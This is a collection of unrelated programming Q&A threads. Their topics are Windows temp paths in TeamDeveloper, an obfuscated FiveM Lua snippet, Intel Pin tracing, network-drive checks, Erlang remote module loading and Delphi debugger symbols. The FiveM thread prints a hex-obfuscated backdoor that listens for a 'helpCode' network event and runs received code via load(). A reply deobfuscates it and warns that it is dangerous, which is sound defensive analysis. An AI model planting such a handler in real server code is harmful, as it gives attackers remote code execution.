I need to get certain special windows folders in Windows 10 from a TD 6.3 program - for instance, Program Files, user, or Appdata. Is there a certain function for this? I've looked through the help but can't seem to find it.
I also need to check if the program currently has read/write access to a folder I specify. I suspect the latter can be achieved by trying a SalFileOpen or SalFileWrite respectively and checking the result.
The point is that I need to get some temporary files from a network location to the local machine to be able to use them, as I only have read access to the network drive.
As of now I've simply created a temp folder in C:\, this works perfectly in debug, but when I build the program and then try running it, for some reason it doesn't get the files and the temp folder stays empty. Thinking this was a permission issue, I tried running as admin to no avail.
I'm kind of at a loss as to why it won't work, so any input is appreciated.
I simply copy the needed files from the network drive to the temp folder using SalFileCopy with the overwrite flag set to true.
You can use windows API-functions for that.
To get the temp-path you can use the following:
Define an external function:
Kernel32.dll
Function: GetTempPathW
Return
DWORD
Parameters:
Number: DWORD ! nBufferLength [in] The size of the string buffer identified by lpBuffer, in TCHARs.
Receive String: LPWSTR ! lpBuffer [out] A pointer to a string buffer that receives the null-terminated string
Use it like that:
Function: GetTempPath ! __exported
Description: WinAPI: This function retrieves the path of the directory designated for temporary files.
Returns
String:
Parameters
Local variables
String: sStrBuffer
Number: nBuffLen
Number: nNumChars
Actions
Set nBuffLen = 0
Call SalSetBufferLength( sStrBuffer, nBuffLen )
Set nBuffLen = GetTempPathW( nBuffLen, sStrBuffer )
Call SalSetBufferLength( sStrBuffer, nBuffLen * 2 )
Call GetTempPathW( nBuffLen, sStrBuffer )
If SalStrRightX( sStrBuffer, 1 ) != '\\'
Set sStrBuffer = sStrBuffer || '\\'
Return sStrBuffer
To check if you have write access just create a file in that folder and delete it afterwards.
Here some more info about the windows API-function:
https://msdn.microsoft.com/de-de/library/windows/desktop/aa364992(v=vs.85).aspx
In case you need any path of the environment variables (e.g. appdata) you can use
VisDosGetEnvString( 'appdata' )
The method is part of the Visual Tool Chest (vt.apl lib within the installation dir)
Related
So while looking at some server files (FiveM/GTA RP Server Files) my friend sent me, I found a line of code that was placed all over the Server's Resources, is it malicious?, since i checked "Hex to ASCII Text String Converter", it looks like it might be an attempt to inject some code into the Lua environment. The code creates a table with several strings that are encoded in hexadecimal format. These strings are then used to access elements in the global environment (_G) and call them as functions. The code also sets up an event listener for the "load" event, which could indicate that the code is intended to run when a specific event occurs in the environment.
Code:
local ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G}
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[1]
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[3]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[2],
function(BFWCBOOqrwrVwzdmKcQZBRMziBAgjQbWLfBPFXhZUzCWlOjKNLUGOYvDisfytJZwIDtHyn)
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[4]()
end)local
ASCII Text to Hex Code Converter
Image
ASCII Text to Hex Code Converter
Response 2
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG is just a variable name. It's not a very nice one, but it is just a variable name.
{"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64"}
is the table:
{"RegisterNetEvent", "helpCode", "AddEventHandler", "assert", "load"}
with the bytes encoded as hex bytes rather than literal characters.
This deobfuscates to:
local funcs = {
"RegisterNetEvent",
"helpCode",
"AddEventHandler",
"assert",
"load",
_G
};
funcs[6][funcs[1]](funcs[2]);
funcs[6][funcs[3]](funcs[2], function(param)
(funcs[6][funcs[4]](funcs[6][funcs[5]](param)))();
end);
Tables in Lua are 1-indexed, so this further deobfuscates to
_G["RegisterNetEvent"]("helpCode");
_G["AddEventHandler"]("helpCode", function(param)
(_G["assert"](_G["load"](param)))();
end);
And could be simplified to
RegisterNetEvent("helpCode")
AddEventHandler("helpCode", function(param)
assert(load(param))()
end)
While it doesn't look blatantly malicious, it does appear to directly compile and invoke raw code received via the "helpCode" network event, which is certainly dangerous if it's used maliciously. It's possible that this is part of some funny dynamic plugin system, but it's equally possible that it's a backdoor designed to give a network attacker command-and-control over the process.
load is not an event, but the global function used to compile code from a string. The essentially causes the script to listen for a helpCode network event, receive whatever payload from the network event, compile it as Lua code, and execute it. Given that it doesn't even attempt to do any sandboxing of the load'd code, I wouldn't run this without a very comprehensive understanding of how it's being used.
I am using intel pin as my primary DBI tool.
I am interested to know how can I trace all variables allocated in a program .
suppose, we have the following snippet in C:
int *ptr_one, *ptr_two, g;
ptr_one = (int *)malloc(sizeof(int));
ptr_two = (int *)malloc(sizeof(int));
*ptr_one = 25;
*ptr_two = 24;
g = 130;
free(ptr_two);
g = 210;
*ptr_two = 50;
I want to know how can I trace specific variables / memory references in my program . for example on the above code, I like to trace the variable "g" in my program with Intel Pin, how it can be done?
for dynamically allocated variables, I'm monitoring malloc/free calls & follow their addresses, but for static ones I do not have any idea .
Another matter is, for dynamically allocated variables, I like to trace them across the whole program, suppose in the above code, I want to monitor (ptr_two) variable changes and modification during my program from start to finish .
If anyone have some idea about that, it can be nice to share it here, sample codes appreciated in Intel Pin .
thank you all .
Simply stated, you can't associate a name from your source code (be it variable or function name) with a memory location on the compiled binary: this information is (probably) lost on the final binary.
This is not true in two cases:
1) If your binary is exporting functions: in this case other binaries must have a means to call the function by name (minus some subtleties), in which case the information must be available somewhere; for example on Windows, binaries that export functions, variables or classes have an export table.
2) You have symbolic information: in your example, either for the global variable or other local variable, you have to use the symbolic information provided by the compiler.
On Linux you will need an external tool / library / program (e.g. libelf.so or libdwarf.so) to parse the symbolic information from the symbol tables (usually dynsym / symtab) if the binary is not stripped.
On windows you have to rely on the program database (*.pdb files); the format is mostly undocumented (although MS is trying to document it) and you have to use either the DbgHelp API or the DIA SDK.
As stated by the PIN user guide (emphasis is mine):
Pin provides access to function names using the symbol object (SYM).
Symbol objects only provide information about the function symbols in
the application. Information about other types of symbols (e.g. data
symbols), must be obtained independently by the tool.
If you have symbolic information you can then associate a variable name - obtained from an external tool - with an address (relative to the module base for global vars or a stack location for local ones). At runtime it is then just a matter of converting the relative address to a virtual one.
I want to do some IO operations (reading files, listing folder content, etc) on a shared/network folder (\\JoulePC\Test\). If the folder is offline then the program will freeze for quite a while EVERY TIME I try to access it.
What I need to build is something like this:
function DriveIsOnline(Path: string): Boolean;
The function should return an answer quickly (under 1 second). I would use the DriveIsOnline before performing any IO operations on that remove folder.
__
The API function GetDriveType will return 1 (which means 'The root path is invalid') if the drive is offline. Will it be logically correct to consider this answer ('1') as an indication that the drive is offline?
(nodeA#foo.hyd.com)8> spawn(nodeA#bar.del.com, tut, test, [hello, 5]).
I want to spawn a process on bar.del.com which has no file system access to foo.hyd.com (from where I am spawning the process), running subroutine "test" of module "tut".
Is there a way to do so, w/o providing the nodeA#bar.del.com with the compiled "tut" module file?
You can use the following function to load a module at remote node without providing the file itself:
load_module(Node, Module) ->
{_Module, Bin, Filename} = code:get_object_code(Module),
rpc:call(Node, code, load_binary, [Module, Filename, Bin]).
As noted in code:load_binary/3 Filename argument is used only to track the path to module and the file it points to is not used by local node_server.
I'm interpreting your question as a desire to not copy the *.beams from your filesystem to the remote file system.
If you are just testing things you can use the nl(Mod) call in the erl shell to load the module on all (currently) known nodes. That is, those that show up in nodes().
This will send the code over and load it from the memory copy, it will not store it in the remote filesystem.
You can also start the remote node using the slave module. A slave accesses its master's filesystem and code server. Ordinary auto-loading will then make sure the module exists in the slave when you call your test:tut/2 function.
You can send the local code to the remote node:
> {Mod, Bin, File} = code:get_object_code(Module).
> rpc:call(RemoteNode, code, load_binary, [Mod, File, Bin]).
I'm trying to see the value of a variable, but the debugger shows me a value of "????". This seems to happen to Currency variables, but not other types (Double and enumerated types are ok).
I'm debugging on Windows XP SP 3 using Delphi 10 Update 2.
The process I'm using is:
Build the project in the BDS IDE.
Copy the exe to the directory where the service is expected to live.
Start the service. It's running locally, I'm not trying to remote debug.
Attach to the service process (Run | Attach to Process).
The process stops at my breakpoint(s), so the attaching seems to be ok.
Evaluate the value of a variable.
To evaluate the variable I've tried:
Hovering the mouse over the variable name. Usually this displays the value, but in this case it doesn't show anything (i.e. no pop-up).
Right-click the variable name, Debug, Evaluate/Modify shows a value of ????.
Right-click the variable name, Debug, Add Watch at Cursor shows a value of ????.
The Local Variables window shows a value of {.
It seems to be related to Currency, so I tried changing the variable type from Currency to Double, and when I re-ran the test the debugger showed the correct value.
The variables I'm trying to evaluate is a local variable with nothing tricky being done, e.g.:
function FooBar: Boolean;
var
foo: Currency;
bar: Double;
begin
foo := 0; // Breakpoint next line, evaluate foo shows "????"
bar := 0; // Breakpoint next line, evaluate bar shows "0"
...
end;
The Project Options I think might be relevant are:
Compiler
Code Generation
Optimization = Off
Stack frames = Off
Pentium-safe FDIV = Off
Syntax options
Strict var-strings = On
Complete boolean eval = Off
Extended syntax = On
Typed # operator = Off
Open parameters = On
Huge strings = On
Assignable typed constants = Off
Runtime Errors
Range Checking = On
I/O Checking = On
Overflow Checking = On
Debugging
Debug Information = On
Local Symbols = On
Debug Info = On
Definitions Only = On
Assertions = On
Use Debug DCUs = Off
Linker
Map file = Detailed
Linker output = Generate DCUs
Exe and DLL options
Include TD32 debug info = On
Include remote debug symbols = On
Can anyone suggest what's causing this and how I can make it work?
Edit:
I tried a test program consisting of a form with a button that formats a Currency variable onto a label. Debugging as described above (attach to process etc), the debugger showed the correct value. Now wondering if the problem is specific to debugging a service ...
Hm - it works for me in Delphy 2006. I did only create a small console app though. A suggestion for a workaround - cast the variable into an int64 inside the debugger. It should show the value multiplied by 10000.
The problem seems to be due to not having program.rsm file in the same directory as program.exe (step 2 of my process copied the exe to somewhere else).
Program.rsm is generated when Include remote debug symbols is enabled. I had it checked, but didn't think it was relevant because I was debugging locally. I'd only ever used program.rsm when debugging remotely, and it didn't occur to me that debugging locally but in a different directory is kind of "remote".
So there appear to be three possible solutions:
Set the path to program.rsm in:
Project | Options | Debugger | Symbol Tables | Debug symbols search path.
Set the output directory in:
Project | Options | Directories/Conditionals | Output directory.
Copy program.rsm to the same directory as program.exe before debugging.
It's still a mystery why the Currency variables were the only ones affected.